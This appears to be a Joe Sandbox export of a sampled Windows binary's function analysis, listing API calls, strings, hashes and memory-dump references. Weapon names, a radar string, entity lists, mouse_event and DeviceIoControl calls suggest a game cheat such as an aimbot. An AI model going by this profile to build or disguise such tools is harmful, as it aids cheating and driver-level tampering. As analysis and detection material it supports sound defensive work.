API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 3
API String ID: 3063020102-3689681476
Opcode ID: 9450d16a5c0a5aad9f456832ff4794e1ce77669376ff6370247aa281e6cf2dcc
Instruction ID: e460708cc7773a4f27d915457932beec6822e92a6909047b5486a87e0a5d1620
Opcode Fuzzy Hash: 9450d16a5c0a5aad9f456832ff4794e1ce77669376ff6370247aa281e6cf2dcc
Instruction Fuzzy Hash: 3282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226D0 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Platinum 2, xrefs: 00007FF7866226D0

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 2
API String ID: 3063020102-2901091026
Opcode ID: 1d8f003122154799508665ed9e1175e9d30b19f98df83f7ff8c2deecfdf59ddc
Instruction ID: f00937af820d77eaab4301c0bbd8632818ece7cc11e3482571dd04cb43546af4
Opcode Fuzzy Hash: 1d8f003122154799508665ed9e1175e9d30b19f98df83f7ff8c2deecfdf59ddc
Instruction Fuzzy Hash: F282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226C1 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Platinum 1, xrefs: 00007FF7866226C1

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 1
API String ID: 3063020102-904033128
Opcode ID: 5177fae08f27499764e2b11314329b5ea7c10f370f8685fba5808235796114f1
Instruction ID: 88d459f530565f0965a9417c23cb30b23ec309f931cd604e3db4af3923cb5f53
Opcode Fuzzy Hash: 5177fae08f27499764e2b11314329b5ea7c10f370f8685fba5808235796114f1
Instruction Fuzzy Hash: 2382F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226AF Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Gold 3, xrefs: 00007FF7866226AF

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 3
API String ID: 3063020102-2894533912
Opcode ID: 6afc31ce1e04bede69752e8b3a73d96e521f72a87040a677a00a5781ed6ab9d6
Instruction ID: 0a2d618ceb64b6c997b33e3e3faf01f7fb801943269f467885089f6df17d73eb
Opcode Fuzzy Hash: 6afc31ce1e04bede69752e8b3a73d96e521f72a87040a677a00a5781ed6ab9d6
Instruction Fuzzy Hash: FB82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662269D Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Gold 2, xrefs: 00007FF78662269D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 2
API String ID: 3063020102-3682608526
Opcode ID: 511e3042c2013622ce6a675ac7ef6ff89e6d06691a8666c6a6b78c63dc5e3316
Instruction ID: 88d6ca8e3bb1152f118aef24e089becfa682e77bc851e9d87ee38bdcde2adab5
Opcode Fuzzy Hash: 511e3042c2013622ce6a675ac7ef6ff89e6d06691a8666c6a6b78c63dc5e3316
Instruction Fuzzy Hash: 5582F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78661DD90 Relevance: 58.4, APIs: 14, Strings: 19, Instructions: 656COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786612E10: DeviceIoControl.KERNEL32 ref: 00007FF786612ECD

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661E86A

Strings

Reaper Sniper Rifle, xrefs: 00007FF78661D827
Bolt-Action Sniper Rifle, xrefs: 00007FF78661D861
Compact SMG, xrefs: 00007FF78661DAAF
Snip, xrefs: 00007FF78661E240
Shot, xrefs: 00007FF78661E110
Burst Assault Rifle, xrefs: 00007FF78661DB8A
Scoped Assault Rifle, xrefs: 00007FF78661DC3E
Thermal Scoped Assault Rifle, xrefs: 00007FF78661DC04
Storm Scout Sniper Rifle, xrefs: 00007FF78661D8DA
Assault Rifle, xrefs: 00007FF78661DB3E
Heavy Sniper Rifle, xrefs: 00007FF78661D8A0
Rifl, xrefs: 00007FF78661E1D7
Tactical Assault Rifle, xrefs: 00007FF78661DBCA
Hunting Rifle, xrefs: 00007FF78661D914
Charge Shotgun, xrefs: 00007FF78661DA14
Suppressed SMG, xrefs: 00007FF78661DA63
Pump Shotgun, xrefs: 00007FF78661D988
Rapid Fire SMG, xrefs: 00007FF78661DAEF
Tactical Shotgun, xrefs: 00007FF78661D9D4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ControlDevice_invalid_parameter_noinfo_noreturn
String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
API String ID: 4009212252-766504981
Opcode ID: 90ebe4b467c330f6f7898888e507790d239e3f002e9bde2ff3291c7a76b3b3da
Instruction ID: 90d1136f885cfa3bd7b607daedeefba71f296d638cddbcc4611c12c3cde0a79f
Opcode Fuzzy Hash: 90ebe4b467c330f6f7898888e507790d239e3f002e9bde2ff3291c7a76b3b3da
Instruction Fuzzy Hash: C152F761F086C665FA21AB399C043FAA362BF55754FA44333D91D266D1EF28FD81CB20

Function 00007FF7866236B0 Relevance: 58.2, APIs: 27, Strings: 6, Instructions: 440keyboardwindowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00007FF78662371C
TranslateMessage.USER32 ref: 00007FF78662372D
DispatchMessageA.USER32 ref: 00007FF78662373A
GetForegroundWindow.USER32 ref: 00007FF786623740
GetWindow.USER32 ref: 00007FF78662375A
SetWindowPos.USER32 ref: 00007FF786623780
GetClientRect.USER32 ref: 00007FF78662379C
ClientToScreen.USER32 ref: 00007FF7866237AD
GetCursorPos.USER32 ref: 00007FF7866237DF
GetAsyncKeyState.USER32 ref: 00007FF786623814
SetWindowPos.USER32 ref: 00007FF7866238B2
GetClientRect.USER32 ref: 00007FF7866238FA
QueryPerformanceCounter.KERNEL32 ref: 00007FF786623928
GetKeyState.USER32 ref: 00007FF786623965
GetKeyState.USER32 ref: 00007FF78662397B
GetKeyState.USER32 ref: 00007FF786623991
ClientToScreen.USER32 ref: 00007FF7866239DD
SetCursorPos.USER32 ref: 00007FF7866239E9
GetActiveWindow.USER32 ref: 00007FF7866239FC
GetCursorPos.USER32 ref: 00007FF786623A0F
ScreenToClient.USER32 ref: 00007FF786623A24
GetAsyncKeyState.USER32 ref: 00007FF786623A87
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF786623AB4
GetAsyncKeyState.USER32 ref: 00007FF786623AFE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786623DB3
DestroyWindow.USER32 ref: 00007FF786623DF4

Strings

Unranked, xrefs: 00007FF786622742
Hands, xrefs: 00007FF786622407
##radar, xrefs: 00007FF78662226B
Nearby Entities: , xrefs: 00007FF7866200BF
VUUU, xrefs: 00007FF786623ABD
Visible Entities: , xrefs: 00007FF78661FEDF

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: StateWindow$Client$AsyncCursorMessageScreen$Rect$ActiveCounterDestroyDispatchForegroundPeekPerformanceQueryTranslatefreerand
String ID: ##radar$Hands$Nearby Entities: $Unranked$VUUU$Visible Entities:
API String ID: 460599277-1119963227
Opcode ID: 6f55e7e6eb818f88b9cc76e3a2dc8329fd7562ec4526b68fdbd10c78b8c7bb01
Instruction ID: 57c4146d2be7a879d615529173893cdfae97014eb474072c5d5968d3a300f0e4
Opcode Fuzzy Hash: 6f55e7e6eb818f88b9cc76e3a2dc8329fd7562ec4526b68fdbd10c78b8c7bb01
Instruction Fuzzy Hash: 4F324B35B18AC2A6FB00EF25DC5467AB3B2FB44B44FA44236D90D537A4CF2CA944CB21

Function 00007FF78662DB3C Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF78662DBE9
GetLastError.KERNEL32 ref: 00007FF78662DBF3
FindFirstFileW.KERNEL32 ref: 00007FF78662DC0A
GetLastError.KERNEL32 ref: 00007FF78662DC16
FindClose.KERNEL32 ref: 00007FF78662DC24
__std_fs_open_handle.LIBCPMT ref: 00007FF78662DCB7
CloseHandle.KERNEL32 ref: 00007FF78662DCCD
CloseHandle.KERNEL32 ref: 00007FF78662DE4A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662DE54

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: 7159fc5b1a6647880897efde78f54b595061372dc9ef2afea58026139ae63b91
Instruction ID: 024af417f2a972b42bbde305eb010eb7647baabffe4206064e1e58fe04dd2bfc
Opcode Fuzzy Hash: 7159fc5b1a6647880897efde78f54b595061372dc9ef2afea58026139ae63b91
Instruction Fuzzy Hash: 4E91C331B08A8256E760AB25AC14277A293BF54BB4FA44330D9AD477D4DF7CEC05CB21

Function 00007FF78661ECD0 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1B5
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1D0
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F1E9
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF78661F207
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661F307

Part of subcall function 00007FF78662CA38: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF7865F2AC0), ref: 00007FF78662CA48

mouse_event.USER32 ref: 00007FF78661F2A9

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998

Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6

Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975

Part of subcall function 00007FF78662CFB4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF78662B985,?,?,?,?,?,00007FF786629EF5), ref: 00007FF78662CFCE

mouse_event.USER32 ref: 00007FF78661F2C1

Strings

ChargeShotgun, xrefs: 00007FF78661EDE3
CombatShotgun, xrefs: 00007FF78661EEC7
DragonBreathShotgun, xrefs: 00007FF78661EE2F
LeverActionShotgun, xrefs: 00007FF78661EE09
PumpShotgun, xrefs: 00007FF78661ED96
DoubleBarrelShotgun, xrefs: 00007FF78661EE55
AutoShotgun, xrefs: 00007FF78661EE7B
TacticalShotgun, xrefs: 00007FF78661EDBC
SlugShotgun, xrefs: 00007FF78661EEED
SingleShotgun, xrefs: 00007FF78661EEA1

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
API String ID: 2172613484-4283324268
Opcode ID: 6130bf9ae6b3f381fa2ce4abc62b5a03a49e19c7598ae3ffa829a659d672f3a8
Instruction ID: e43425fa2b5b255bf618e827402b653fa6a0bd170db66aa52d84e3b0b29a596c
Opcode Fuzzy Hash: 6130bf9ae6b3f381fa2ce4abc62b5a03a49e19c7598ae3ffa829a659d672f3a8
Instruction Fuzzy Hash: 9602E762F14BC6A5E710EB35DC413FAA362BF95794FA05332E95C22695EF38E980C710

Function 00007FF7865FF8F0 Relevance: 26.0, APIs: 20, Instructions: 1048COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FF9B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FF9D7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFAB1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFADD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFB7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFC28
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFC4B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FFC75
memset.VCRUNTIME140 ref: 00007FF7865FFC8D
memset.VCRUNTIME140 ref: 00007FF7865FFC9B
memset.VCRUNTIME140 ref: 00007FF7865FFCA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7866001C5
memset.VCRUNTIME140 ref: 00007FF7866001DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7866003BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7866003DA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786600833
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786600854
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786600875
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF786600414

Part of subcall function 00007FF786601180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7866009B3), ref: 00007FF7866011E3
Part of subcall function 00007FF786601180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7866009B3), ref: 00007FF786601214

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7866009F5

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free$malloc$memset
String ID:
API String ID: 1620901979-0
Opcode ID: be5415dcf8b1c2700579f5f15daabd33cabd424ebe063dd0a36447333c6c5eb0
Instruction ID: c456f0e9bcf240bb4939d2a58930f6dc1ba4c13e169c0322cd8add770b1c3999
Opcode Fuzzy Hash: be5415dcf8b1c2700579f5f15daabd33cabd424ebe063dd0a36447333c6c5eb0
Instruction Fuzzy Hash: ADB2E032B047809AE755EF26E4406BEB7A1FB48B88F548336DE4963754DF38E895CB10

Function 00007FF7865F5DF0 Relevance: 15.8, APIs: 10, Instructions: 830COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F5F2F
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F64C7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F64F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F699A
memcpy.VCRUNTIME140 ref: 00007FF7865F69BD
memcpy.VCRUNTIME140 ref: 00007FF7865F69D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F69F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F6A1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F6A57
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F6A7C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

